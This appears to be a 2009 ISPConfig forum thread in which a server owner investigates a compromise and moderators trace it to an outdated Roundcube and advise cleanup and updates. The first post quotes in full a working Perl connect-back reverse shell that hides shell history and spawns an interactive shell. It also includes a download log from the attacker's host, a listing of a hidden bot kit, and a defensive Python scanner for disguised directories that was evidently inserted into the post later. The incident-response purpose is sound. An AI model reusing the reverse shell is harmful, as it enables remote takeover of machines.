Server Hacked ispconfig leak?

Discussion in 'General' started by clandistwood, Apr 1, 2009.

  1. clandistwood

    clandistwood New Member

    Hi,

My server was blocked by my provider; here's the log of their detection program:
    Code:
    --------------------------- LOGS DE SCAN ---------------------------
    
    DDOS attacks with 46bytes pkts
    
    startime endtime scr:port dst:port
    ----------------------------------------------------------------------------------------------
    2009-03-31 14:51:25 2009-03-31 14:51:26 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:51:26 2009-03-31 14:51:28 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:51:28 2009-03-31 14:51:45 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:51:45 2009-03-31 14:51:50 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:51:50 2009-03-31 14:51:53 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:51:53 2009-03-31 14:52:18 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:52:38 2009-03-31 14:53:12 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:53:12 2009-03-31 14:53:18 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:53:18 2009-03-31 14:53:21 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:53:21 2009-03-31 14:53:23 x.x.x.x:47700 88.84.141.189:0
    2009-03-31 14:53:23 2009-03-31 14:53:26 x.x.x.x:47700 88.84.141.189:0
    
    Here, x.x.x.x is my ip address.

In rescue mode (SSH only, with no other services running), I was able to connect to the server, and here's what I found in /root/ispconfig/httpd/logs/error_log:

    Code:
    --14:45:44--  http://alecsandru.ilive.ro/nc.jpg
               => `nc.jpg'
    Resolving alecsandru.ilive.ro... 86.55.1.30
    Connecting to alecsandru.ilive.ro|86.55.1.30|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 872 [image/jpeg]
    
        0K                                                       100%  125.66 MB/s
    
    14:45:44 (125.66 MB/s) - `nc.jpg' saved [872/872]
    
    
When I searched for nc.jpg, it was not found anywhere on my server; it was probably deleted by the hacker.

But when I download it from http://alecsandru.ilive.ro/, here is what it looks like:

    Code:
    #!/usr/bin/perl
    use Socket;
    print "\n[~] Incerc sa fac legatura =)\n";
    $host = $ARGV[0];
    $port = 8080;
    if ($ARGV[1]) {
      $port = $ARGV[1];
    }
    $proto = getprotobyname('tcp') || die("[-] Nu merge treaba\n\n");
    socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Eroare socket\n\n");
    my $target = inet_aton($host);
    if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
      die("[-] Conecktback Esuat\n\n");
    }
    if (!fork( )) {
      open(STDIN,">&SERVER");
      open(STDOUT,">&SERVER");
      open(STDERR,">&SERVER");
      print "[+] Conectback by sTrEs ... private version 
    =)\n"; 
      system("unset HISTFILE; unset HISTSAVE ; uname -a ; id ; w ; echo \"[+] Time to burn...\";echo \"[+] Do not fucking press Ctrl C\"; /bin/sh -i");
      exit(0);
    }
    print "[+] Conectback Reusit !\n\n";
    
    
    Backdoor for sure :(

chkrootkit found nothing, but while searching I found a strange folder ".." in /var/tmp; it was hidden by its name so I couldn't notice it, but I did :rolleyes:

In this folder I found a ".shell" folder, and in it:
    Code:
    drwx------ 5 admispconfig admispconfig   4096 Apr  1 15:45 .
    drwxr-xr-x 3 admispconfig admispconfig   4096 Apr  1 16:31 ..
    -rw-r--r-- 1 admispconfig admispconfig     59 Mar 31 14:50 JohnDoe.seen
    -rwxr-xr-x 1 admispconfig admispconfig    118 Mar 31 14:46 LinkEvents
    drwxr-xr-x 3 admispconfig admispconfig   4096 Oct 11  2002 flood
    -rwx--x--x 1 admispconfig admispconfig 488645 Jan 13  2003 httpd
    -rwx--x--x 1 admispconfig admispconfig  22935 Oct 10  2000 mech.help
    -rwxr-xr-x 1 admispconfig admispconfig   1084 Mar  8  2002 mech.levels
    -rw------- 1 admispconfig admispconfig      6 Mar 31 14:46 mech.pid
    -rwxr-xr-x 1 admispconfig admispconfig   1406 Mar 13 22:49 mech.set
    drwx--x--x 2 admispconfig admispconfig   4096 Nov  8  2000 randfiles
    drwx--x--x 2 admispconfig admispconfig   4096 Mar  8  2002 src
    -rwxr-xr-x 1 admispconfig admispconfig     69 Mar 13 22:50 x.users
    
    
The folder has admispconfig privileges, as you can see.

    Can you please tell me what to do next?

Just delete the folder? Clean ISPConfig? Maybe upgrade to 3; will this solve the problem for sure?
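As an added example (not code from the thread), a small Python hunt for the kind of dot-and-space named directory described above under /var/tmp, listing every executable inside it with its owner uid; the demo tree it builds is constructed to mirror the listing in this post, with dummy files, and `scan_temp_dirs` is the live-host entry point.

```python
import os
import re
import stat
import tempfile

# Names built only from dots and whitespace (". ", ".. ", "...") sit beside the real "."
# and ".." in "ls -la" output; os.scandir never yields those two, so any match is planted.
DISGUISED_NAME = re.compile(r"^[.\s]+$")

def find_disguised_dirs(root):
    """Return directories directly under `root` whose names mimic '.' or '..'."""
    return sorted(e.path for e in os.scandir(root)
                  if e.is_dir(follow_symlinks=False) and DISGUISED_NAME.match(e.name))

def list_executables(directory):
    """Walk `directory`; return (relative path, owner uid) for each regular file with an
    execute bit set, which is where a dropped bot, flooder or shell binary shows up."""
    found = []
    for dirpath, _dirs, filenames in os.walk(directory):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)                       # lstat: do not follow symlinks
            if stat.S_ISREG(st.st_mode) and st.st_mode & 0o111:
                found.append((os.path.relpath(path, directory), st.st_uid))
    return sorted(found)

def scan_temp_dirs(roots=("/tmp", "/var/tmp")):
    """Map every disguised directory under the world-writable temp roots to its executables."""
    return {d: list_executables(d)
            for root in roots if os.path.isdir(root)
            for d in find_disguised_dirs(root)}

def build_demo_tree():
    """Constructed sample tree mirroring the thread's '/var/tmp/.. /.shell' listing (dummy files)."""
    base = tempfile.mkdtemp()
    shell_dir = os.path.join(base, ".. ", ".shell")
    os.makedirs(shell_dir)
    for name, mode in (("httpd", 0o711), ("mech.set", 0o755),
                       ("mech.pid", 0o600), ("JohnDoe.seen", 0o644)):
        path = os.path.join(shell_dir, name)
        with open(path, "w") as fh:
            fh.write("placeholder\n")
        os.chmod(path, mode)
    os.makedirs(os.path.join(base, "legit_dir"))     # ordinary name: must not be reported
    return base

if __name__ == "__main__":
    for d, files in scan_temp_dirs().items():       # run on a live host
        print(d, files)
```

Run it as root so the walk can enter mode 0700 directories like the one in the listing; a hit only tells you where to look, not that the files are harmless or hostile.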
     
  2. till

    till Super Moderator Staff Member ISPConfig Developer

    Do you have roundcube installed and if yes, which version?
     
  3. clandistwood

    clandistwood New Member

Thanks till for the reply.

Yes, I installed the 0.1-stable version of roundcube months ago.
     
  4. till

    till Super Moderator Staff Member ISPConfig Developer

Then your server was hacked through roundcube, which has a vulnerability in this version, and not ISPConfig. As roundcube runs under the user admispconfig too, the files are saved under the admispconfig user.

1) Delete the files in /tmp.
2) Install the latest roundcube.pkg.
3) Update to the latest ISPConfig 2.x version (2.2.30).
     
  5. deconectat

    deconectat New Member

  6. clandistwood

    clandistwood New Member

Since the hacker was able to take admispconfig privileges, would it be safer if I uninstall ISPConfig and then reinstall version 3? What do you think about that, Till?
Or do you think that I'll be fine with this (erasing /tmp, upgrading ISPConfig and roundcube)?
     
  7. clandistwood

    clandistwood New Member

Thanks deconectat,

I have just sent them an email about that; hope they will act soon.
     
  8. till

    till Super Moderator Staff Member ISPConfig Developer

The user admispconfig does not have any special privileges, but of course he might have inserted something into the ispconfig database, e.g. to reconfigure a site.

ISPConfig 3 is not an update of ISPConfig 2; it is different software and there is no way to do a direct update.

The safest way is always to reinstall a server that has been hacked. But in your case it might just be that the system has been attacked by some kind of semi-automated exploit script and the hacker has not gained any higher privileges yet. So I would just update ispconfig and roundcube and clean /tmp. Then you should have a closer look at the system over the next days to see if anything unusual happens.

    For security reasons you should also change the root password and mysql root password.
     
  9. clandistwood

    clandistwood New Member

    thx

    Thx Till,

    I have cleaned the server, installed latest ispconfig2 (ISPConfig-2.2.31) and upgraded to the latest release of roundcube.

    thx again
     
  10. khayjake

    khayjake Member

    they used netcat..what about roundcube 2a?

    Looks like they used a netcat like method to spawn the shell.

Glad I upgraded roundcube; I didn't know about this vulnerability.

What about Roundcube version 2a?

I have roundcube 2a installed but have hesitated to install 0.2.1 because I read a post saying it doesn't transfer over the sqlite user authentication data...?

I simply cannot recreate every user email account if that's what 0.2.1 requires... however, I'd be willing to if roundcube 2a is exploitable...

Anybody know if this vulnerability is in the roundcube 2a release for ISPConfig as well?

    Thanks

    Khayjake
     
  11. till

    till Super Moderator Staff Member ISPConfig Developer

You might want to ask Hans, the maintainer of the roundcube packages, for details. If I remember correctly, I've read somewhere that there was a way to export the data from the sqlite database and then reimport it in the new version.
     
  12. hahni

    hahni New Member

    Hello Till,

About the same problem I have written you a PM.

    Best regards

    HahniP
     
